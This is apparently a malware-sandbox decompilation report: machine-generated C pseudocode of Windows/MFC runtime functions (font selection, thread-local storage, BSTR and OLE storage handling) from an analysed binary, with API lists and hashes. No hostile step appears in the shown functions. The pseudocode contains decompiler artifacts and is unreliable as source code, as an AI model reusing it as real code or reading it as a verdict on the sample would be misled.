                                                      				void* _t29;
                                                      				signed short _t30;
                                                      				struct HDC__* _t31;
                                                      				signed int _t32;
                                                      
                                                      				_t12 =  *0x443590; // 0xa920217c
                                                      				_v8 = _t12 ^ _t32;
                                                      				_t31 = GetStockObject;
                                                      				_t30 = 0xa;
                                                      				_v72 = __ecx;
                                                      				_t23 = "System";
                                                      				_t14 = GetStockObject(0x11);
                                                      				if(_t14 != 0) {
                                                      					L2:
                                                      					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                      						_t23 =  &_v40;
                                                      						_t31 = GetDC(0);
                                                      						if(_v68 < 0) {
                                                      							_v68 =  ~_v68;
                                                      						}
                                                      						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                      						ReleaseDC(0, _t31);
                                                      					}
                                                      					L6:
                                                      					_t16 = _a4;
                                                      					if(_a4 == 0) {
                                                      						_t16 = _t30 & 0x0000ffff;
                                                      					}
                                                      					return E0041E5DF(E00410A89(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                      				}
                                                      				_t14 = GetStockObject(0xd);
                                                      				if(_t14 == 0) {
                                                      					goto L6;
                                                      				}
                                                      				goto L2;
                                                      			}


















                                                      APIs
                                                      • GetStockObject.GDI32(00000011), ref: 00410BFE
                                                      • GetStockObject.GDI32(0000000D), ref: 00410C06
                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 00410C13
                                                      • GetDC.USER32(00000000), ref: 00410C22
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00410C36
                                                      • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00410C42
                                                      • ReleaseDC.USER32 ref: 00410C4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                      • String ID: System
                                                      • API String ID: 46613423-3470857405
                                                      • Opcode ID: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
                                                      • Instruction ID: a4a223aa5b9c112fe65b1d2b54281de720986542eecb78d2bebc38cd9b2bbfe9
                                                      • Opcode Fuzzy Hash: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
                                                      • Instruction Fuzzy Hash: F5118675700218EBEB149BA1DC45FEF7BB8AF54745F000126F601A7280EBB49D45CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E0040F361(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t36;
                                                      				void* _t39;
                                                      				long _t41;
                                                      				void* _t42;
                                                      				long _t47;
                                                      				void* _t53;
                                                      				signed int _t55;
                                                      				long* _t62;
                                                      				struct _CRITICAL_SECTION* _t64;
                                                      				void* _t65;
                                                      				void* _t66;
                                                      
                                                      				_push(0x10);
                                                      				E0041F71D(E0043284B, __ebx, __edi, __esi);
                                                      				_t62 = __ecx;
                                                      				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                      				_t64 = __ecx + 0x1c;
                                                      				 *(_t66 - 0x14) = _t64;
                                                      				EnterCriticalSection(_t64);
                                                      				_t36 =  *(_t66 + 8);
                                                      				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                      					_push(_t64);
                                                      				} else {
                                                      					_t65 = TlsGetValue( *_t62);
                                                      					if(_t65 == 0) {
                                                      						 *(_t66 - 4) = 0;
                                                      						_t39 = E0040F014(0x10);
                                                      						__eflags = _t39;
                                                      						if(__eflags == 0) {
                                                      							_t65 = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							 *_t39 = 0x436638;
                                                      							_t65 = _t39;
                                                      						}
                                                      						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                      						_t51 =  &(_t62[5]);
                                                      						 *(_t65 + 8) = 0;
                                                      						 *(_t65 + 0xc) = 0;
                                                      						E0040F130( &(_t62[5]), _t65);
                                                      						goto L5;
                                                      					} else {
                                                      						_t55 =  *(_t66 + 8);
                                                      						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                      							L5:
                                                      							_t75 =  *(_t65 + 0xc);
                                                      							if( *(_t65 + 0xc) != 0) {
                                                      								_t41 = E0040EAD1(_t51, __eflags, _t62[3], 4);
                                                      								_t53 = 2;
                                                      								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                      							} else {
                                                      								_t47 = E0040EAD1(_t51, _t75, _t62[3], 4);
                                                      								_pop(_t53);
                                                      								_t42 = LocalAlloc(0, _t47);
                                                      							}
                                                      							_t76 = _t42;
                                                      							if(_t42 == 0) {
                                                      								LeaveCriticalSection( *(_t66 - 0x14));
                                                      								_t42 = E004037AF(0, _t53, _t62, _t65, _t76);
                                                      							}
                                                      							 *(_t65 + 0xc) = _t42;
                                                      							E0041F330(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                      							 *(_t65 + 8) = _t62[3];
                                                      							TlsSetValue( *_t62, _t65);
                                                      							_t55 =  *(_t66 + 8);
                                                      						}
                                                      					}
                                                      					_t36 =  *(_t65 + 0xc);
                                                      					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                      						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                      					}
                                                      					_push( *(_t66 - 0x14));
                                                      				}
                                                      				LeaveCriticalSection();
                                                      				return E0041F7C2(_t36);
                                                      			}















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 0040F368
                                                      • EnterCriticalSection.KERNEL32(?,00000010,0040F604,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F379
                                                      • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F397
                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F3CB
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437
                                                      • _memset.LIBCMT ref: 0040F456
                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                      • String ID:
                                                      • API String ID: 1891723912-0
                                                      • Opcode ID: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
                                                      • Instruction ID: caa35618f7ee786639fd244a17305f6c3d39311c605f35e51643f12fe2b3081d
                                                      • Opcode Fuzzy Hash: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
                                                      • Instruction Fuzzy Hash: B331C374400605AFCB20AF50D885CAEB7A4FF54314B20C53FE956A7A90CB34AE95CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 42%
                                                      			E0041C1DE(void* __edx, void* __eflags) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t42;
                                                      				void* _t46;
                                                      				void* _t47;
                                                      				void* _t52;
                                                      				intOrPtr _t66;
                                                      				intOrPtr _t74;
                                                      				void* _t76;
                                                      				void* _t96;
                                                      				void* _t97;
                                                      				intOrPtr* _t98;
                                                      				void* _t99;
                                                      				short* _t101;
                                                      				void* _t102;
                                                      				signed int _t103;
                                                      				void* _t105;
                                                      
                                                      				_t96 = __edx;
                                                      				_t103 = _t105 - 0x8c;
                                                      				_t42 =  *0x443590; // 0xa920217c
                                                      				 *(_t103 + 0x88) = _t42 ^ _t103;
                                                      				_t74 =  *((intOrPtr*)(_t103 + 0x98));
                                                      				_t101 =  *((intOrPtr*)(_t103 + 0x94));
                                                      				_push(_t97);
                                                      				E0041F330(_t97, _t101, 0, 0x20);
                                                      				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
                                                      				_t46 = E0040EC01(_t74, 0x437038);
                                                      				_t98 = __imp__#2;
                                                      				if(_t46 == 0) {
                                                      					_t78 = _t74;
                                                      					_t47 = E0040EC01(_t74, "dNC");
                                                      					__eflags = _t47;
                                                      					_push(0x100);
                                                      					_push(_t103 - 0x78);
                                                      					if(_t47 == 0) {
                                                      						_push(0xf108);
                                                      						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
                                                      						 *_t101 = 0xf108;
                                                      					} else {
                                                      						_push(0xf10a);
                                                      						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
                                                      						 *_t101 = 0xf10a;
                                                      					}
                                                      				} else {
                                                      					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
                                                      					 *_t101 =  *((intOrPtr*)(_t74 + 8));
                                                      					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
                                                      					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
                                                      					_t66 =  *((intOrPtr*)(_t74 + 0x14));
                                                      					_t111 =  *((intOrPtr*)(_t66 - 0xc));
                                                      					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
                                                      						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
                                                      						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      					}
                                                      					_t74 =  *((intOrPtr*)(_t74 + 0x18));
                                                      					_t113 =  *((intOrPtr*)(_t74 - 0xc));
                                                      					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
                                                      						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
                                                      						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
                                                      				_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      				_t114 =  *((intOrPtr*)(_t101 + 4));
                                                      				if( *((intOrPtr*)(_t101 + 4)) == 0) {
                                                      					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t114) + 0x10)));
                                                      					_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      				}
                                                      				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
                                                      					_t117 =  *((intOrPtr*)(_t101 + 0x10));
                                                      					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
                                                      						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t117) + 4)) + 0x64)));
                                                      						_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      					}
                                                      				}
                                                      				_pop(_t99);
                                                      				_pop(_t102);
                                                      				_pop(_t76);
                                                      				return E0041E5DF(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
                                                      			}























                                                      APIs
                                                      • _memset.LIBCMT ref: 0041C20D
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C25E
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C282
                                                        • Part of subcall function 004036AB: __EH_prolog3.LIBCMT ref: 004036B2
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C2DA
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C303
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C332
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AllocString$H_prolog3_memset
                                                      • String ID: dNC
                                                      • API String ID: 842698744-833669199
                                                      • Opcode ID: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
                                                      • Instruction ID: 9748dfd0f260f4af5954bde45890adc7de7677ef7dc0e4187cfbdd75b949ec51
                                                      • Opcode Fuzzy Hash: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
                                                      • Instruction Fuzzy Hash: 394171309002089FCB34EFB9CC91A9EB7B4AF44318F10856FE465A72E2DB79A554CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E00417FED(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				short* _t48;
                                                      				intOrPtr _t55;
                                                      				void* _t56;
                                                      				void* _t59;
                                                      
                                                      				_t59 = __eflags;
                                                      				_push(4);
                                                      				E0041F6EA(E00433268, __ebx, __edi, __esi);
                                                      				_t55 = __ecx;
                                                      				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
                                                      				E004048ED(__ecx, _t59);
                                                      				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
                                                      				 *((intOrPtr*)(_t56 - 4)) = 0;
                                                      				 *((intOrPtr*)(__ecx)) = 0x436c84;
                                                      				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t56 + 8));
                                                      				 *((intOrPtr*)(__ecx + 0x28)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x50)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x54)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x58)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x64)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x70)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x88)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x8c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x90)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x94)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x98)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
                                                      				E00402890(__ecx + 0xa4);
                                                      				 *((char*)(_t56 - 4)) = 1;
                                                      				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
                                                      				E0041C6AB(__ecx + 0xbc);
                                                      				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xc8)) = 0x436ab8;
                                                      				 *((intOrPtr*)(__ecx + 0xcc)) = 0x436c04;
                                                      				 *((intOrPtr*)(__ecx + 0xd0)) = 0x436ae0;
                                                      				 *((intOrPtr*)(__ecx + 0xd4)) = 0x436b0c;
                                                      				 *((intOrPtr*)(__ecx + 0xd8)) = 0x436b2c;
                                                      				 *((intOrPtr*)(__ecx + 0xdc)) = 0x436b44;
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x436b64;
                                                      				_t48 = __ecx + 0xac;
                                                      				 *((intOrPtr*)(__ecx + 0xe4)) = 0x436b78;
                                                      				 *((intOrPtr*)(__ecx + 0xe8)) = 0x436ba4;
                                                      				E0041F330(0, _t48, 0, 0x10);
                                                      				 *_t48 = 0;
                                                      				return E0041F7C2(_t55);
                                                      			}








                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_memset
                                                      • String ID: ,kC$DkC$dkC$xkC$jC
                                                      • API String ID: 2828583354-3858571362
                                                      • Opcode ID: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
                                                      • Instruction ID: 4e71a2d175be7ae7ae6f7a1d80f1dc51b3f0f7cb739eefa1d1a8814e24de44bf
                                                      • Opcode Fuzzy Hash: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
                                                      • Instruction Fuzzy Hash: E73190B0801B51DAD320DF2AC54578AFBE4BFA5308F11DA0FD1EA97661C7B86149CF29
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E004148AC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t114;
                                                      				intOrPtr _t118;
                                                      				intOrPtr* _t119;
                                                      				void* _t120;
                                                      				intOrPtr* _t121;
                                                      				void* _t122;
                                                      				intOrPtr* _t125;
                                                      				intOrPtr* _t127;
                                                      				void _t129;
                                                      				intOrPtr* _t131;
                                                      				long _t134;
                                                      				void* _t135;
                                                      				void* _t136;
                                                      				void* _t137;
                                                      				void _t139;
                                                      				void _t141;
                                                      				void* _t143;
                                                      				void* _t144;
                                                      				void* _t147;
                                                      				void* _t148;
                                                      				void _t149;
                                                      				void* _t151;
                                                      				intOrPtr* _t153;
                                                      				void* _t154;
                                                      				void _t158;
                                                      				void* _t159;
                                                      				void _t161;
                                                      				intOrPtr* _t163;
                                                      				void* _t168;
                                                      				intOrPtr* _t170;
                                                      				intOrPtr* _t172;
                                                      				intOrPtr* _t174;
                                                      				void* _t175;
                                                      				intOrPtr _t186;
                                                      				intOrPtr* _t206;
                                                      				void* _t210;
                                                      				intOrPtr* _t219;
                                                      				intOrPtr* _t221;
                                                      				void* _t222;
                                                      				void* _t224;
                                                      
                                                      				_push(0x68);
                                                      				_t114 = E0041F6EA(E00432DB2, __ebx, __edi, __esi);
                                                      				_t221 = __ecx;
                                                      				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
                                                      				_t219 = __ecx + 0x50;
                                                      				 *(_t224 - 0x10) = 0;
                                                      				if( *_t219 != 0) {
                                                      					L2:
                                                      					 *(_t224 + 8) = 0;
                                                      					 *(_t224 - 0x14) = 0;
                                                      					 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                      					E00413164(_t221, _t221 + 0x40);
                                                      					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
                                                      					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
                                                      					if(_t118 != 0) {
                                                      						L5:
                                                      						_t222 =  *(_t224 + 0xc);
                                                      						if(_t222 == 0) {
                                                      							__eflags =  *(_t224 + 0x10);
                                                      							if( *(_t224 + 0x10) != 0) {
                                                      								L16:
                                                      								_t119 =  *_t219;
                                                      								_t210 = _t224 - 0x14;
                                                      								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x439410, _t210);
                                                      								__eflags = _t120;
                                                      								if(_t120 < 0) {
                                                      									L43:
                                                      									if( *(_t224 - 0x10) >= 0) {
                                                      										L46:
                                                      										_t121 =  *((intOrPtr*)(_t224 + 0x14));
                                                      										if(_t121 != 0) {
                                                      											 *((intOrPtr*)( *_t121 + 8))(_t121);
                                                      										}
                                                      										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
                                                      											 *(_t224 - 0x10) = 1;
                                                      										}
                                                      										_t122 =  *(_t224 - 0x10);
                                                      										L52:
                                                      										return E0041F7C2(_t122);
                                                      									}
                                                      									L44:
                                                      									_t125 =  *_t219;
                                                      									if(_t125 != 0) {
                                                      										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
                                                      										_t127 =  *_t219;
                                                      										 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                      										 *_t219 = 0;
                                                      									}
                                                      									goto L46;
                                                      								}
                                                      								__eflags = _t222;
                                                      								if(_t222 != 0) {
                                                      									__eflags =  *(_t224 + 0x10);
                                                      									if( *(_t224 + 0x10) == 0) {
                                                      										 *(_t224 - 0x10) = 0x8000ffff;
                                                      										L37:
                                                      										_t129 =  *(_t224 - 0x14);
                                                      										L38:
                                                      										 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                      										L39:
                                                      										if( *(_t224 - 0x10) < 0) {
                                                      											goto L44;
                                                      										}
                                                      										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
                                                      											_t186 =  *((intOrPtr*)(_t224 - 0x24));
                                                      											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
                                                      												_t131 =  *_t219;
                                                      												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
                                                      											}
                                                      										}
                                                      										goto L43;
                                                      									}
                                                      									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
                                                      									__eflags = _t210;
                                                      									 *(_t224 - 0x2c) = _t134;
                                                      									if(__eflags > 0) {
                                                      										L29:
                                                      										 *(_t224 - 0x10) = 0x8007000e;
                                                      										 *(_t224 + 0x10) = 0;
                                                      										L30:
                                                      										__eflags =  *(_t224 + 0x10);
                                                      										 *(_t224 - 0x1c) = 0;
                                                      										if( *(_t224 + 0x10) == 0) {
                                                      											goto L37;
                                                      										}
                                                      										_t135 = _t224 - 0x1c;
                                                      										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
                                                      										__eflags = _t135;
                                                      										 *(_t224 - 0x10) = _t135;
                                                      										if(_t135 < 0) {
                                                      											goto L37;
                                                      										}
                                                      										_t136 = _t224 - 0x18;
                                                      										 *(_t224 - 0x18) = 0;
                                                      										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
                                                      										__eflags = _t136;
                                                      										 *(_t224 - 0x10) = _t136;
                                                      										if(_t136 >= 0) {
                                                      											_t139 =  *(_t224 - 0x14);
                                                      											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
                                                      											_t141 =  *(_t224 - 0x18);
                                                      											 *((intOrPtr*)( *_t141 + 8))(_t141);
                                                      										}
                                                      										_t137 =  *(_t224 - 0x1c);
                                                      										L35:
                                                      										 *((intOrPtr*)( *_t137 + 8))(_t137);
                                                      										goto L37;
                                                      									}
                                                      									if(__eflags < 0) {
                                                      										L26:
                                                      										_t143 = GlobalAlloc(0, _t134);
                                                      										__eflags = _t143;
                                                      										 *(_t224 + 0x10) = _t143;
                                                      										if(_t143 == 0) {
                                                      											goto L29;
                                                      										}
                                                      										_t144 = GlobalLock(_t143);
                                                      										__eflags = _t144;
                                                      										if(_t144 == 0) {
                                                      											goto L29;
                                                      										}
                                                      										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
                                                      										GlobalUnlock( *(_t224 + 0x10));
                                                      										goto L30;
                                                      									}
                                                      									__eflags = _t134 - 0xffffffff;
                                                      									if(_t134 >= 0xffffffff) {
                                                      										goto L29;
                                                      									}
                                                      									goto L26;
                                                      								}
                                                      								_t147 = _t224 + 0xc;
                                                      								 *(_t224 + 0xc) = 0;
                                                      								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
                                                      								__eflags = _t147;
                                                      								 *(_t224 - 0x10) = _t147;
                                                      								if(_t147 < 0) {
                                                      									goto L37;
                                                      								}
                                                      								_t148 = _t224 + 0x10;
                                                      								 *(_t224 + 0x10) = 0;
                                                      								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
                                                      								__eflags = _t148;
                                                      								 *(_t224 - 0x10) = _t148;
                                                      								if(_t148 >= 0) {
                                                      									_t149 =  *(_t224 - 0x14);
                                                      									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
                                                      									_t151 =  *(_t224 + 0x10);
                                                      									 *((intOrPtr*)( *_t151 + 8))(_t151);
                                                      								}
                                                      								_t137 =  *(_t224 + 0xc);
                                                      								goto L35;
                                                      							}
                                                      							L11:
                                                      							_t153 =  *_t219;
                                                      							_t213 = _t224 + 8;
                                                      							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x4394a0, _t224 + 8);
                                                      							__eflags = _t154;
                                                      							if(_t154 < 0) {
                                                      								goto L16;
                                                      							} else {
                                                      								__eflags = _t222;
                                                      								if(__eflags != 0) {
                                                      									E00411776(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
                                                      									 *(_t224 - 4) = 0;
                                                      									E0041D04F(_t224 - 0x2c, _t224 - 0x74);
                                                      									_t158 =  *(_t224 + 8);
                                                      									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
                                                      									_t47 = _t224 - 4;
                                                      									 *_t47 =  *(_t224 - 4) | 0xffffffff;
                                                      									__eflags =  *_t47;
                                                      									 *(_t224 - 0x10) = _t159;
                                                      									E00411738(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
                                                      								} else {
                                                      									_t161 =  *(_t224 + 8);
                                                      									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
                                                      								}
                                                      								_t129 =  *(_t224 + 8);
                                                      								goto L38;
                                                      							}
                                                      						}
                                                      						if( *(_t224 + 0x10) != 0) {
                                                      							goto L16;
                                                      						}
                                                      						_t163 =  *_t219;
                                                      						_push(_t224 + 0x14);
                                                      						_push(0x4394b0);
                                                      						_push(_t163);
                                                      						if( *((intOrPtr*)( *_t163))() < 0) {
                                                      							goto L11;
                                                      						}
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(3);
                                                      						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
                                                      							goto L11;
                                                      						} else {
                                                      							 *(_t224 + 0x10) = 0;
                                                      							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
                                                      							_t206 =  *((intOrPtr*)(_t224 + 0x14));
                                                      							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
                                                      							_t170 =  *((intOrPtr*)(_t224 + 0x14));
                                                      							 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                      							 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                      							goto L39;
                                                      						}
                                                      					}
                                                      					_t172 =  *_t219;
                                                      					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
                                                      					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
                                                      						goto L5;
                                                      					}
                                                      					_t174 =  *_t219;
